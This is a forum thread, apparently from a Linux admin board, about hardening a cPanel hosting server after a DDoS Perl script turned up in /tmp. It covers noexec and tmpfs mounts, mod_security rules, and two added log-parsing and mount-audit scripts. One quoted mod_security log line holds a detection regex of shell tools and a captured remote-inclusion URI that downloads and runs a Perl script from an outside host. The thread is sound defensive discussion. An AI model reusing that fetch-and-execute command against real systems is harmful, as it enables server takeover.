# malicious script in /tmp - cpanel

## ddaas

Hi,

I have a hosting server (cpanel/whm) with almost 500 accounts.

Till now no security incident has occurred. Yesterday I found a Perl script in the /tmp directory which launched some sort of DDoS attack (it sent 20Mbs to different networks on the internet).

Please give me some guidelines on how I could protect my server in the future from this kind of attack. (What could I do? Are there any "hardening tools" for /tmp, etc.?)

Thanks

----------

## MrUlterior

*ddaas wrote:*

> Hi,
> 
> I have a hosting server (cpanel/whm) with almost 500 accounts.
> 
> Till now no security incident has occurred. Yesterday I found a Perl script in the /tmp directory which launched some sort of DDoS attack (it sent 20Mbs to different networks on the internet).
> ...

/tmp should be:

1. A separate partition, to prevent an attacker flooding it with data in order to kill your syslogd

2. mounted with "noexec" option in your /fstab

But *you* have a bigger problem: you've got scripts running insecurely or a vulnerable version of PHP and/or Apache; this needs to be addressed immediately. You can validate this by seeing who owned the file in /tmp: if it's apache or nobody, you know the source of your problems. Personally, I'd pull that server IMMEDIATELY and rebuild it, eyeballing everything, and ensure I have AIDE/Tripwire and Logwatch to ensure rootkits aren't present.

I'd also highly recommend you get a little more clued up on the subject; it's your responsibility if you're running any sort of server. Begin with replacing your standard kernel with a hardened one and chrooting your services.

----------

## ddaas

Hi there,

Thanks for your advice.

That is not my server and I don't know exactly how it was configured. A friend of mine who runs this hosting service asked me to help him harden his server.

The problem is that it uses cpanel for its management. 

After I searched around I found the following:

- the installation started from a "minimal installation". Then cpanel installed everything (exim, apache, php, etc.). It manages everything on that system (user accounts, updates, backup, etc.). I don't like these automatic scripts like cpanel, webmin, etc. You have no flexibility and you have to do everything from their interface; otherwise things could get messed up. I would prefer a "by hand" solution where the admin is in control. But maybe for a hosting solution this is preferable.

Anyway:

/tmp is on its own partition:

```
/dev/sda6 on /tmp type ext3 (rw,noexec,nosuid) [/tmp]
```

noexec and nosuid don't help against running a Perl script. It is world-writable because it is needed by some services (apache, mysql, etc.) and I think it needs to remain this way. The sticky bit is set.

I've installed AIDE, rkhunter, chkrootkit, a log management system, etc. Apache, PHP, MySQL, etc. are stable and updated (not the latest version, but a version without major known bugs). I will also set up a firewall to not allow outbound connections.

The problem is that there are 200-300 user hosting accounts and every user is responsible for the content of their site, scripts, etc. Practically anyone could copy/install anything in their /home directory.

I'll try to find out who owned that Perl script. Let's suppose (and I do suppose) that apache owned that script. What could I do to prevent something similar?

Thanks

----------

## ddaas

I found out that mod_security is a nice piece of software for protecting a web server: http://www.modsecurity.org/

It does a lot of nice things and it is easy to use.

I think it will also be useful to protect /tmp from malicious scripts.

If anyone uses it, I would like to see some example rules to protect /tmp and other directories from uploading and executing malicious scripts.

Thanks

----------

## kamikaze04

I use mod_security on all my servers. You can find some perfectly usable rules at www.gotroot.com --> download --> security tools

:) This module has saved me on some occasions when a vulnerability appeared and I didn't patch it immediately... it cut off malicious scripts. :)

----------

## ddaas

Hi,

I have already set up the rules from gotroot.com.

I started with all rules from all files and httpd consumed more than 50% CPU and a lot of RAM. I was afraid that the whole server would crash. Now I don't use badip and blacklist and everything works acceptably.

How do you use the rules from gotroot? Do you use all of them? How loaded is your server?

Do you automatically update them from www.gotroot.com or do you manually verify every rule?

Thanks

----------

## kamikaze04

Hi,

My servers usually don't have lots of visits per second. But when they do, mod_security makes my server's processor go really "busy". The solution is that the rules from gotroot.com are general and you must adapt them to your needs. Go through all the files and delete everything you don't need. Blacklisted IPs are very heavy. You could also check other rules.

For example, 95% of the time, the rule that is used most on my servers is this one:

```
apache2[16898]: [error] [client 1.1.7.154] mod_security: Access denied with redirect to [http://www.google.com]. Pattern match "(\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ |\\./|whoami|killall |rm \\-[a-z|A-Z]))" at THE_REQUEST [hostname "xxx.xxx.xx.es"] [uri "/~xxxxx/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gothicangel.photojerk.com/~abt/cmd.txt?&cmd=cd%20/tmp;wget%20http://gothicangel.photojerk.com/~abt/mambus.txt;perl%20mambus.txt;rm%20-rf%20mambus.txt"]
```

which prevents using wget, python, perl, etc., which are the usual way of exploiting vulnerabilities. There is an example.

You probably won't need lots of the rules... it is just a bit of work the first time. After all, you can update your rules calmly, because the really important rules are always the same.

----------
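The error_log line kamikaze04 posted above is the kind of evidence a server admin should be watching for in bulk rather than one line at a time. The script below is an added example, not code from the thread or from the mod_security project: it pulls the client address and request URI out of Apache error_log lines in which mod_security 1.x denied a request, and counts denials per client so repeat offenders stand out. The sample log lines are constructed for this example (the format mirrors the posted line, but the addresses, hostnames and URIs are placeholders); the function and variable names are the example's own.

```shell
#!/bin/sh
# Added example (not from the thread): summarise mod_security 1.x denials
# found in Apache error_log lines, in the format kamikaze04 posted.

# Constructed sample log lines; addresses, hostnames and URIs are placeholders.
SAMPLE_LOG='apache2[16898]: [error] [client 192.0.2.10] mod_security: Access denied with redirect to [http://www.google.com]. Pattern match "(cmd|command)=(cd|wget )" at THE_REQUEST [hostname "www.example.invalid"] [uri "/~user/mambo/index.php?cmd=cd%20/tmp;wget%20http://files.example.invalid/x.txt"]
apache2[16899]: [notice] child pid 16901 exit signal Segmentation fault (11)
apache2[16900]: [error] [client 192.0.2.10] mod_security: Access denied with redirect to [http://www.google.com]. Pattern match "(cmd|command)=(cd|wget )" at THE_REQUEST [hostname "www.example.invalid"] [uri "/~user/mambo/index.php?cmd=wget%20http://files.example.invalid/y.txt"]
apache2[16902]: [error] [client 198.51.100.7] mod_security: Access denied with redirect to [http://www.google.com]. Pattern match "(cmd|command)=(cd|wget )" at THE_REQUEST [hostname "www.example.invalid"] [uri "/~other/index.php?cmd=cd%20/tmp"]'

# modsec_denials
# stdin: error_log lines; stdout: one "CLIENT URI" line per mod_security denial.
# Lines that are not denials (the child-exit notice above) are dropped by grep.
modsec_denials() {
    grep 'mod_security: Access denied' |
        sed -n 's/.*\[client \([^]]*\)\].*\[uri "\([^"]*\)"\].*/\1 \2/p'
}

# modsec_denials_per_client
# stdin: error_log lines; stdout: "COUNT CLIENT", most frequent client first.
modsec_denials_per_client() {
    modsec_denials | awk '{ print $1 }' | sort | uniq -c | sort -rn |
        awk '{ print $1, $2 }'
}

# top_denied_client
# stdin: error_log lines; stdout: the client with the most denials (empty if none).
top_denied_client() {
    modsec_denials_per_client | head -n 1 | awk '{ print $2 }'
}

# Demonstration on the constructed lines. On a live cPanel box you would feed
# the real log instead, e.g.: modsec_denials_per_client < /usr/local/apache/logs/error_log
printf '%s\n' "$SAMPLE_LOG" | modsec_denials_per_client
# 2 192.0.2.10
# 1 198.51.100.7
```

The per-client counts are what you would feed into a temporary firewall block or an alert; the full "CLIENT URI" output from `modsec_denials` is what you keep for the incident record, since the URI shows which account's script was targeted.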

## kamikaze04

You will probably find this web page useful:

http://www.directadmin.com/forum/showthread.php?threadid=11125

----------

## CodAv

I'm using a RAM disk on my servers and desktop for /tmp. This has several advantages, the only major drawback is that it consumes some memory on heavily used machines, depending on your maximum size setting (but just as much as needed to store the files). To make /tmp a RAM disk, just empty the folder (stop all unneeded services and programs first!) and add this line to your /etc/fstab:

```
tmpfs                   /tmp            tmpfs           nodev,noexec,nosuid,size=100M,mode=1777      0 0
```

Change the size option to match your requirements and RAM size. I have about 30 customers on my web server, and the /tmp folder contains about 1 MB of files on average (except for some short peaks).

----------
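MrUlterior's two points (separate filesystem, noexec in fstab), ddaas's mount line and CodAv's tmpfs entry all come down to what /proc/mounts reports for /tmp. The script below is an added example, not code from the thread, that audits a /tmp mount line for a separate filesystem and the nodev, noexec and nosuid options. The two sample lines are constructed here in /proc/mounts layout to match ddaas's ext3 mount and CodAv's tmpfs entry; the function names are the example's own. Note the check only covers mount options: as ddaas points out, noexec does not stop `perl /tmp/script` being run through an interpreter, so this is a floor, not a complete defence.

```shell
#!/bin/sh
# Added example (not from the thread): audit a /tmp mount line for the hardening
# options discussed above (separate filesystem, nodev, noexec, nosuid).
# Input lines use the /proc/mounts layout: DEVICE MOUNTPOINT FSTYPE OPTIONS DUMP PASS.

# Constructed sample lines, typed here by hand rather than read from a system:
# the first reproduces ddaas's ext3 /tmp mount, the second CodAv's tmpfs entry.
DDAAS_TMP='/dev/sda6 /tmp ext3 rw,noexec,nosuid 0 0'
CODAV_TMP='tmpfs /tmp tmpfs rw,nodev,noexec,nosuid,size=100M,mode=1777 0 0'

# tmp_missing_opts LINE
# Prints, space separated, which of nodev/noexec/nosuid are absent from the
# mount options in LINE. Prints an empty line when all three are present.
tmp_missing_opts() {
    opts=$(printf '%s\n' "$1" | awk '{ print $4 }')
    missing=''
    for want in nodev noexec nosuid; do
        case ",$opts," in
            *",$want,"*) ;;                     # option present
            *) missing="$missing $want" ;;      # option absent
        esac
    done
    printf '%s\n' "${missing# }"
}

# tmp_mount_line
# Emits the live /tmp entry from /proc/mounts, or nothing when /tmp is not a
# separate filesystem (i.e. it still lives on the root filesystem).
tmp_mount_line() {
    awk '$2 == "/tmp"' /proc/mounts 2>/dev/null
}

# tmp_report LINE
# Prints "ok" when LINE carries all three options, otherwise "missing: ...".
tmp_report() {
    m=$(tmp_missing_opts "$1")
    if [ -z "$m" ]; then
        printf 'ok\n'
    else
        printf 'missing: %s\n' "$m"
    fi
}

# Demonstration on the constructed lines, then on the running system if /proc is there.
tmp_report "$DDAAS_TMP"       # missing: nodev
tmp_report "$CODAV_TMP"       # ok
live=$(tmp_mount_line)
if [ -n "$live" ]; then
    tmp_report "$live"
else
    printf '/tmp is not a separate filesystem\n'
fi
```

Run it once after editing /etc/fstab and remounting (`mount -o remount /tmp`) to confirm the options actually took effect; a typo in fstab silently leaves the old mount in place, and /proc/mounts, not fstab, is what the kernel is really enforcing.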

